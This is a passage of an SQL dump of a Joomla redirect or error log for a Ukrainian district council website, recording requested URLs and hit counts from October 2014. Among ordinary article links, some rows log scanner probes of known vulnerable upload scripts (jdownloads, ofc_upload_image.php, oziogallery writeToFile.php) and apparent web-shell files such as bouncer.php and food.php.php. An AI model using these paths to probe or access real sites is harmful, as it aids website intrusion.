00:00:00',301),(6767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l------r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-04 14:41:38','0000-00-00 00:00:00',301),(6768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-04 14:43:52','0000-00-00 00:00:00',301),(6769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-04 14:59:06','0000-00-00 00:00:00',301),(6770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=ru','','','',2,0,'2014-10-04 15:15:22','0000-00-00 00:00:00',301),(6771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=ru','','','',2,0,'2014-10-04 15:15:24','0000-00-00 00:00:00',301),(6772,'http://www.malyn-rayrada.org.ua/portal/components/com_community/index.html','','','',6,0,'2014-10-04 15:15:32','0000-00-00 00:00:00',301),(6773,'http://www.malyn-rayrada.org.ua/portal/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 15:15:38','0000-00-00 00:00:00',301),(6774,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-10-04 15:15:44','0000-00-00 00:00:00',301),(6775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-04 15:16:00','0000-00-00 00:00:00',301),(6776,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=uk&Itemid=','','','',2,0,'2014-10-04 15:23:05','0000-00-00 00:00:00',301),(6777,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-10-04 15:31:21','0000-00-00 00:00:00',301),(6778,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-04 15:35:55','0000-00-00 00:00:00',301),(6779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-04 15:43:46','0000-00-00 00:00:00',301),(6780,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=uk','','','',5,0,'2014-10-04 15:43:48','0000-00-00 00:00:00',301),(6781,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=uk','','','',7,0,'2014-10-04 15:51:19','0000-00-00 00:00:00',301),(6782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 16:10:45','0000-00-00 00:00:00',301),(6783,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-04 16:11:52','0000-00-00 00:00:00',301),(6784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-04 16:14:25','0000-00-00 00:00:00',301),(6785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-04 16:15:59','0000-00-00 00:00:00',301),(6786,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-04 16:16:00','0000-00-00 00:00:00',301),(6787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-04 16:29:26','0000-00-00 00:00:00',301),(6788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-04 16:33:29','0000-00-00 00:00:00',301),(6789,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-04 16:41:16','0000-00-00 00:00:00',301),(6790,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-04 16:43:44','0000-00-00 00:00:00',301),(6791,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=999:2013-04-28-05-21-05&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-04 16:54:43','0000-00-00 00:00:00',301),(6792,'http://www.malyn-rayrada.org.ua/joomla/components/com_community/index.html','','','',3,0,'2014-10-04 17:00:20','0000-00-00 00:00:00',301),(6793,'http://www.malyn-rayrada.org.ua/joomla/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 17:00:24','0000-00-00 00:00:00',301),(6794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',13,0,'2014-10-04 17:07:35','0000-00-00 00:00:00',301),(6795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=36&Itemid=70&lang=en','','','',3,0,'2014-10-04 17:10:23','0000-00-00 00:00:00',301),(6796,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-04 17:13:37','0000-00-00 00:00:00',301),(6797,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-04 17:16:26','0000-00-00 00:00:00',301),(6798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-04 17:16:35','0000-00-00 00:00:00',301),(6799,'http://malyn-rayrada.org.ua/malk/components/com_community/index.html','','','',4,0,'2014-10-04 17:19:47','0000-00-00 00:00:00',301),(6800,'http://malyn-rayrada.org.ua/malk/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 17:19:54','0000-00-00 00:00:00',301),(6801,'http://www.malyn-rayrada.org.ua/mu157/components/com_community/index.html','','','',7,0,'2014-10-04 17:34:04','0000-00-00 00:00:00',301),(6802,'http://www.malyn-rayrada.org.ua/mu157/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 17:34:08','0000-00-00 00:00:00',301),(6803,'http://www.malyn-rayrada.org.ua/ver1/components/com_community/index.html','','','',4,0,'2014-10-04 17:45:31','0000-00-00 00:00:00',301),(6804,'http://www.malyn-rayrada.org.ua/ver1/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 17:45:35','0000-00-00 00:00:00',301),(6805,'http://www.malyn-rayrada.org.ua/site/components/com_community/index.html','','','',21,0,'2014-10-04 18:19:00','0000-00-00 00:00:00',301),(6806,'http://www.malyn-rayrada.org.ua/site/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 18:19:08','0000-00-00 00:00:00',301),(6807,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=uk','','','',2,0,'2014-10-04 18:25:13','0000-00-00 00:00:00',301),(6808,'http://www.malyn-rayrada.org.ua/ru/components/com_community/index.html','','','',2,0,'2014-10-04 18:41:49','0000-00-00 00:00:00',301),(6809,'http://www.malyn-rayrada.org.ua/ru/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-04 18:41:53','0000-00-00 00:00:00',301),(6810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-04 18:45:30','0000-00-00 00:00:00',301),(6811,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47&Itemid=86&lang=en','','','',1,0,'2014-10-04 18:45:53','0000-00-00 00:00:00',301),(6812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&Itemid=14&lang=en','','','',1,0,'2014-10-04 18:47:46','0000-00-00 00:00:00',301),(6813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-10-04 19:02:56','0000-00-00 00:00:00',301),(6814,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-04 19:16:06','0000-00-00 00:00:00',301),(6815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-04 19:22:39','0000-00-00 00:00:00',301),(6816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',10,0,'2014-10-04 19:37:05','0000-00-00 00:00:00',301),(6817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-04 19:37:51','0000-00-00 00:00:00',301),(6818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',31,0,'2014-10-04 19:40:11','0000-00-00 00:00:00',301),(6819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-10-04 19:44:59','0000-00-00 00:00:00',301),(6820,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-10-04 19:45:09','0000-00-00 00:00:00',301),(6821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-04 19:47:15','0000-00-00 00:00:00',301),(6822,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-10-04 19:53:40','0000-00-00 00:00:00',301),(6823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&Itemid=14&lang=ru','','','',22,0,'2014-10-04 19:58:56','0000-00-00 00:00:00',301),(6824,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-04 20:06:01','0000-00-00 00:00:00',301),(6825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-10-04 20:07:41','0000-00-00 00:00:00',301),(6826,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-04 20:21:05','0000-00-00 00:00:00',301),(6827,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-04 20:21:12','0000-00-00 00:00:00',301),(6828,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-04 20:27:37','0000-00-00 00:00:00',301),(6829,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47:-21022013-&Itemid=86&lang=uk','','','',7,0,'2014-10-04 20:40:02','0000-00-00 00:00:00',301),(6830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&Itemid=14&lang=en','','','',103,0,'2014-10-04 20:45:03','0000-00-00 00:00:00',301),(6831,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',9,0,'2014-10-04 20:54:03','0000-00-00 00:00:00',301),(6832,'http://www.malyn-rayrada.org.ua/images/stories/bouncer.php?rf','','','',1,0,'2014-10-04 21:04:38','0000-00-00 00:00:00',301),(6833,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-04 21:11:29','0000-00-00 00:00:00',301),(6834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-04 21:13:29','0000-00-00 00:00:00',301),(6835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-04 21:28:42','0000-00-00 00:00:00',301),(6836,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-10-04 22:03:39','0000-00-00 00:00:00',301),(6837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&Itemid=14&lang=en','','','',8,0,'2014-10-04 22:37:50','0000-00-00 00:00:00',301),(6838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56&Itemid=97&lang=en','','','',8,0,'2014-10-04 22:41:09','0000-00-00 00:00:00',301),(6839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:-21022013-&Itemid=86&lang=en','','','',5,0,'2014-10-04 22:42:31','0000-00-00 00:00:00',301),(6840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=uk','','','',3,0,'2014-10-04 22:50:37','0000-00-00 00:00:00',301),(6841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-04 23:45:18','0000-00-00 00:00:00',301),(6842,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=en','','','',4,0,'2014-10-05 00:02:27','0000-00-00 00:00:00',301),(6843,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-05 00:17:28','0000-00-00 00:00:00',301),(6844,'http://malyn-rayrada.org.ua/werkstatt/components/com_community/index.html','','','',1,0,'2014-10-05 00:23:51','0000-00-00 00:00:00',301),(6845,'http://malyn-rayrada.org.ua/werkstatt/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-05 00:24:15','0000-00-00 00:00:00',301),(6846,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1089:--------l---r---&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-05 02:58:38','0000-00-00 00:00:00',301),(6847,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-05 05:20:32','0000-00-00 00:00:00',301),(6848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-10-05 05:20:36','0000-00-00 00:00:00',301),(6849,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59&Itemid=107&lang=uk','','','',7,0,'2014-10-05 05:36:19','0000-00-00 00:00:00',301),(6850,'http://www.malyn-rayrada.org.ua/wp-login.php','','','',63,0,'2014-10-05 05:39:06','0000-00-00 00:00:00',301),(6851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-05 05:41:40','0000-00-00 00:00:00',301),(6852,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-10-05 05:42:03','0000-00-00 00:00:00',301),(6853,'http://www.malyn-rayrada.org.ua/admin/','','','',10,0,'2014-10-05 05:45:12','0000-00-00 00:00:00',301),(6854,'http://www.malyn-rayrada.org.ua/user/','','','',3,0,'2014-10-05 05:46:43','0000-00-00 00:00:00',301),(6855,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-05 05:48:45','0000-00-00 00:00:00',301),(6856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-05 05:49:55','0000-00-00 00:00:00',301),(6857,'http://www.malyn-rayrada.org.ua/site2/components/com_community/index.html','','','',1,0,'2014-10-05 06:20:35','0000-00-00 00:00:00',301),(6858,'http://www.malyn-rayrada.org.ua/site2/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-05 06:20:40','0000-00-00 00:00:00',301),(6859,'http://www.malyn-rayrada.org.ua/site2/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-05 06:20:43','0000-00-00 00:00:00',301),(6860,'http://www.malyn-rayrada.org.ua/site2/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-05 06:20:49','0000-00-00 00:00:00',301),(6861,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-10-05 06:33:38','0000-00-00 00:00:00',301),(6862,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-05 06:50:17','0000-00-00 00:00:00',301),(6863,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1116:-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-05 07:05:47','0000-00-00 00:00:00',301),(6864,'http://malyn-rayrada.org.ua/forum/components/com_community/index.html','','','',1,0,'2014-10-05 07:32:18','0000-00-00 00:00:00',301),(6865,'http://www.malyn-rayrada.org.ua/1/components/com_community/index.html','','','',1,0,'2014-10-05 07:42:37','0000-00-00 00:00:00',301),(6866,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=en','','','',6,0,'2014-10-05 07:44:13','0000-00-00 00:00:00',301),(6867,'http://www.malyn-rayrada.org.ua/prensa/components/com_community/index.html','','','',2,0,'2014-10-05 08:06:29','0000-00-00 00:00:00',301),(6868,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1369:-lr-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-05 08:21:56','0000-00-00 00:00:00',301),(6869,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=970:-90-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-05 08:23:55','0000-00-00 00:00:00',301),(6870,'http://www.malyn-rayrada.org.ua/korttelikiekko/components/com_community/index.html','','','',3,0,'2014-10-05 08:46:11','0000-00-00 00:00:00',301),(6871,'http://www.malyn-rayrada.org.ua/elperiodigolf/components/com_community/index.html','','','',6,0,'2014-10-05 09:25:11','0000-00-00 00:00:00',301),(6872,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-05 10:33:51','0000-00-00 00:00:00',301),(6873,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-05 10:33:54','0000-00-00 00:00:00',301),(6874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-05 10:34:15','0000-00-00 00:00:00',301),(6875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-05 10:34:17','0000-00-00 00:00:00',301),(6876,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-05 10:34:20','0000-00-00 00:00:00',301),(6877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-05 10:34:22','0000-00-00 00:00:00',301),(6878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-05 10:34:25','0000-00-00 00:00:00',301),(6879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-05 10:34:28','0000-00-00 00:00:00',301),(6880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=en&Itemid=0','','','',2,0,'2014-10-05 10:34:32','0000-00-00 00:00:00',301),(6881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-05 10:34:39','0000-00-00 00:00:00',301),(6882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-05 10:34:47','0000-00-00 00:00:00',301),(6883,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&lang=en&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1130%3A2013-11-07-14-04-12&lang=en&option=com_content&view=artic','',3,0,'2014-10-05 10:39:20','0000-00-00 00:00:00',301),(6884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-05 11:10:10','0000-00-00 00:00:00',301),(6885,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-05 11:10:12','0000-00-00 00:00:00',301),(6886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=7:2010-06-05-12-53-35&layout=blog&Itemid=12&lang=uk','','','',4,0,'2014-10-05 11:11:00','0000-00-00 00:00:00',301),(6887,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-10-05 11:13:37','0000-00-00 00:00:00',301),(6888,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1266:2014-04-03-05-25-14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-05 11:15:40','0000-00-00 00:00:00',301),(6889,'http://www.malyn-rayrada.org.ua/main/components/com_community/index.html','','','',1,0,'2014-10-05 11:22:31','0000-00-00 00:00:00',301),(6890,'http://www.malyn-rayrada.org.ua/images/stories/food.php.php?rf','','','',2,0,'2014-10-05 11:25:26','0000-00-00 00:00:00',301),(6891,'http://malyn-rayrada.org.ua/images/stories/food.php.php?rf','','','',1,0,'2014-10-05 11:29:53','0000-00-00 00:00:00',301),(6892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-05 11:59:48','0000-00-00 00:00:00',301),(6893,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-10-05 12:14:34','0000-00-00 00:00:00',301),(6894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-10-05 12:14:43','0000-00-00 00:00:00',301),(6895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56:--03022014-&Itemid=97&lang=en','','','',6,0,'2014-10-05 12:14:48','0000-00-00 00:00:00',301),(6896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56:--03022014-&Itemid=97&lang=ru','','','',14,0,'2014-10-05 12:14:54','0000-00-00 00:00:00',301),(6897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57:--15042014-&Itemid=98&lang=en','','','',2,0,'2014-10-05 12:15:07','0000-00-00 00:00:00',301),(6898,'http://www.malyn-rayrada.org.ua/esperanzaaguirre/components/com_community/index.html','','','',3,0,'2014-10-05 12:21:55','0000-00-00 00:00:00',301),(6899,'http://www.malyn-rayrada.org.ua/jm/components/com_community/index.html','','','',2,0,'2014-10-05 12:32:00','0000-00-00 00:00:00',301),(6900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-05 12:56:25','0000-00-00 00:00:00',301),(6901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-05 13:11:31','0000-00-00 00:00:00',301),(6902,'http://malyn-rayrada.org.ua/tr/components/com_community/index.html','','','',1,0,'2014-10-05 13:17:28','0000-00-00 00:00:00',301),(6903,'http://www.malyn-rayrada.org.ua/www/components/com_community/index.html','','','',1,0,'2014-10-05 13:20:17','0000-00-00 00:00:00',301),(6904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-05 13:26:13','0000-00-00 00:00:00',301),(6905,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-05 13:50:09','0000-00-00 00:00:00',301),(6906,'http://www.malyn-rayrada.org.ua/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-10-05 14:12:09','0000-00-00 00:00:00',301),(6907,'http://www.malyn-rayrada.org.ua/tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-10-05 14:12:13','0000-00-00 00:00:00',301),(6908,'http://www.malyn-rayrada.org.ua/tr/components/com_community/index.html','','','',1,0,'2014-10-05 14:12:18','0000-00-00 00:00:00',301),(6909,'http://www.malyn-rayrada.org.ua/tr/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-05 14:12:23','0000-00-00 00:00:00',301),(6910,'http://www.malyn-rayrada.org.ua/tr/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-05 14:12:26','0000-00-00 00:00:00',301),(6911,'http://www.malyn-rayrada.org.ua/tr/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-05 14:12:33','0000-00-00 00:00:00',301),(6912,'http://www.malyn-rayrada.org.ua/tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-05 14:12:35','0000-00-00 00:00:00',301),(6913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',2,0,'2014-10-05 15:58:37','0000-00-00 00:00:00',301),(6914,'http://www.malyn-rayrada.org.ua/gst/components/com_community/index.html','','','',1,0,'2014-10-05 